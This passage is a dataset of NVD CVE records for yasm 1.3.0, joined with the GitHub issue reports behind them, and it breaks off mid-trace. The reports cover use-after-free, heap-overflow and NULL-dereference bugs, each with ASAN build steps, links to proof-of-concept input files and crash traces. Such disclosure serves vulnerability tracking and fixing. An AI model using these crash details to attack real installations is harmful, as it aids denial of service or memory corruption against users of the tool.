AddressSanitizer: heap-use-after-free in expr_traverse_nodes_post() libyasm/expr.c:1112
https://api.github.com/repos/yasm/yasm/issues/165/comments
1
2021-05-19T08:21:12Z
2024-03-21T12:28:49Z
https://github.com/yasm/yasm/issues/165
895,142,015
165
CVE-2021-33463
2022-07-26T13:15:09.687
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr__copy_except() in libyasm/expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/174" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/174
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-1113-yasm_expr__copy_except-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==10834==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x7fdb4c7eafb3 bp 0x7fff7a57d890 sp 0x7fff7a57d840 T0) #0 0x7fdb4c7eafb2 in yasm_expr__copy_except test/yasm-uaf/SRC_asan/libyasm/expr.c:999 #1 0x7fdb4908fad6 in nasm_parser_directive test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:1584 #2 0x7fdb4909bd3c in parse_line test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:377 #3 0x7fdb4909bd3c in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:231 #4 0x7fdb4908f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fdb4908f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fdb4c21382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/libyasm/expr.c:999 yasm_expr__copy_except ==10834==ABORTING ```
A NULL pointer dereference in the function yasm_expr__copy_except() libyasm/expr.c:999
https://api.github.com/repos/yasm/yasm/issues/174/comments
2
2021-05-19T08:30:07Z
2024-03-22T14:00:39Z
https://github.com/yasm/yasm/issues/174
895,150,639
174
CVE-2021-33464
2022-07-26T13:15:09.730
An issue was discovered in yasm version 1.3.0. There is a heap-buffer-overflow in inc_fopen() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/164" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/164
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-7306d-inc_fopen-heap-buffer-overflow ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==19224==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000009cea at pc 0x7f3f6962c06e bp 0x7ffce951a4d0 sp 0x7ffce9519c78 WRITE of size 23 at 0x603000009cea thread T0 #0 0x7f3f6962c06d in strcat (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7306d) #1 0x7f3f65bb8458 in strcat /usr/include/x86_64-linux-gnu/bits/string3.h:148 #2 0x7f3f65bb8458 in inc_fopen test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1835 #3 0x7f3f65bb8458 in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2737 #4 0x7f3f65bc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #5 0x7f3f65ba9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #6 0x7f3f65b9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #7 0x7f3f65b8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #8 0x7f3f65b8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #9 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #10 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #11 0x7f3f68d9782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x603000009cea is located 0 bytes to the right of 26-byte region [0x603000009cd0,0x603000009cea) allocated by thread T0 here: #0 0x7f3f69651602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f3f693a2769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f3f65bb840c in inc_fopen test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1823 #3 0x7f3f65bb840c in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:2737 #4 0x7f3f65bc0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #5 0x7f3f65ba9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #6 0x7f3f65b9b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #7 0x7f3f65b8f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #8 0x7f3f65b8f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #9 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #10 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #11 0x7f3f68d9782f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strcat Shadow bytes around the buggy address: 0x0c067fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9370: fa fa fa fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff9380: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd =>0x0c067fff9390: fd fa fa fa fd fd fd fa fa fa 00 00 00[02]fa fa 0x0c067fff93a0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff93b0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd 0x0c067fff93c0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa 0x0c067fff93d0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa 0x0c067fff93e0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==19224==ABORTING ```
AddressSanitizer: heap-buffer-overflow in inc_fopen() modules/preprocs/nasm/nasm-pp.c:1835
https://api.github.com/repos/yasm/yasm/issues/164/comments
4
2021-05-19T08:20:09Z
2022-12-14T17:47:19Z
https://github.com/yasm/yasm/issues/164
895,140,978
164
CVE-2021-33465
2022-07-26T13:15:09.773
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmacro() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/173" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/173
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4760-expand_mmacro-null-pointer-deref ASAN info: ```C ASAN:SIGSEGV ================================================================= ==17359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x7f2e6f6c3fc6 bp 0x7ffd238e70b0 sp 0x7ffd238e6f00 T0) #0 0x7f2e6f6c3fc5 in expand_mmacro test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4764 #1 0x7f2e6f6c3fc5 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5128 #2 0x7f2e6f6a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f2e6f69b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f2e6f68f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f2e6f68f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f2e7286b82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4764 expand_mmacro ==17359==ABORTING ```
A NULL pointer dereference in the function expand_mmacro() modules/preprocs/nasm/nasm-pp.c:4764
https://api.github.com/repos/yasm/yasm/issues/173/comments
1
2021-05-19T08:29:17Z
2024-03-21T12:35:36Z
https://github.com/yasm/yasm/issues/173
895,149,848
173
CVE-2021-33466
2022-07-26T13:15:09.817
An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_smacro() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/172" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/172
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) I think it is probably a similar issue as [#142](https://github.com/yasm/yasm/issues/142) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4352-expand_smacro-null-pointer-deref ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ASAN:SIGSEGV ================================================================= ==16729==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000001c (pc 0x7fa8f23b196d bp 0x7fff0c7cf990 sp 0x7fff0c7cf820 T0) #0 0x7fa8f23b196c in expand_smacro test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4229 #1 0x7fa8f23c0ac7 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5127 #2 0x7fa8f23a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7fa8f239b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7fa8f238f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7fa8f238f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7fa8f559882f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4229 expand_smacro ==16729==ABORTING ```
A NULL pointer dereference in the function expand_smacro() modules/preprocs/nasm/nasm-pp.c:4229
https://api.github.com/repos/yasm/yasm/issues/172/comments
1
2021-05-19T08:28:18Z
2024-03-21T12:36:44Z
https://github.com/yasm/yasm/issues/172
895,148,925
172
CVE-2021-33467
2022-07-26T13:15:09.860
An issue was discovered in yasm version 1.3.0. There is a use-after-free in pp_getline() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/163" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/163
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-5020-pp_getline-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==18582==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00000ccb8 at pc 0x7f24ad5c6232 bp 0x7ffdbe2b8fb0 sp 0x7ffdbe2b8fa0 READ of size 4 at 0x60e00000ccb8 thread T0 #0 0x7f24ad5c6231 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5024 #1 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #2 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #3 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #4 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #5 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #6 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #7 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #8 0x403ee8 in _start ( test/yasm-uaf/bin_asan/bin/yasm+0x403ee8) 0x60e00000ccb8 is located 152 bytes inside of 160-byte region [0x60e00000cc20,0x60e00000ccc0) freed by thread T0 here: #0 0x7f24b0f9a2ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca) #1 0x7f24ad5bfd48 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5009 #2 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #3 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #4 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #5 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #6 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #7 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #8 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) previously allocated by thread T0 here: #0 0x7f24b0f9a602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f24b0ceb769 in def_xmalloc test/yasm-uaf/SRC_asan/libyasm/xmalloc.c:69 #2 0x7f24ad5b500b in do_directive test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:3211 #3 0x7f24ad5c0333 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5083 #4 0x7f24ad5a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #5 0x7f24ad59b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #6 0x7f24ad58f36b in nasm_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:66 #7 0x7f24ad58f36b in nasm_parser_do_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parser.c:83 #8 0x402c84 in do_assemble test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:521 #9 0x402c84 in main test/yasm-uaf/SRC_asan/frontends/yasm/yasm.c:753 #10 0x7f24b06e082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-use-after-free test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5024 pp_getline Shadow bytes around the buggy address: 0x0c1c7fff9940: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff9950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff9960: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c1c7fff9970: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff9980: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd =>0x0c1c7fff9990: fd fd fd fd fd fd fd[fd]fa fa fa fa fa fa fa fa 0x0c1c7fff99a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99b0: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff99c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff99d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1c7fff99e0: 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==18582==ABORTING ```
AddressSanitizer: heap-use-after-free in pp_getline() modules/preprocs/nasm/nasm-pp.c:5024
https://api.github.com/repos/yasm/yasm/issues/163/comments
1
2021-05-19T08:19:19Z
2024-03-21T12:37:57Z
https://github.com/yasm/yasm/issues/163
895,140,170
163
CVE-2021-33468
2022-07-26T13:15:09.903
An issue was discovered in yasm version 1.3.0. There is a use-after-free in error() in modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://gist.github.com/Clingto/bb632c0c463f4b2c97e4f65f751c5e6d" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yasm/yasm/issues/162" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/yasm/yasm/issues/162
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
System info: Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, yasm (latest master 009450c) Compile Command: ``` $ ./autogen.sh make distclean CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared make -j make install ``` Run Command: ``` $ yasm $POC ``` POC file: https://github.com/Clingto/POC/blob/master/MSA/yasm/yasm-4826-error-UAF ASAN info: ```C yasm: file name already has no extension: output will be in `yasm.out' ================================================================= ==17967==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00000cd08 at pc 0x7f820a4aa94b bp 0x7ffd4c279450 sp 0x7ffd4c279440 READ of size 8 at 0x60e00000cd08 thread T0 #0 0x7f820a4aa94a in error test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:4830 #1 0x7f820a4aceaf in tokenise test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:1352 #2 0x7f820a4c0300 in pp_getline test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-pp.c:5037 #3 0x7f820a4a9d46 in nasm_preproc_get_line test/yasm-uaf/SRC_asan/modules/preprocs/nasm/nasm-preproc.c:198 #4 0x7f820a49b2ac in nasm_parser_parse test/yasm-uaf/SRC_asan/modules/parsers/nasm/nasm-parse.c:218 #5 0x7f820a48f36b in nasm_do_parse 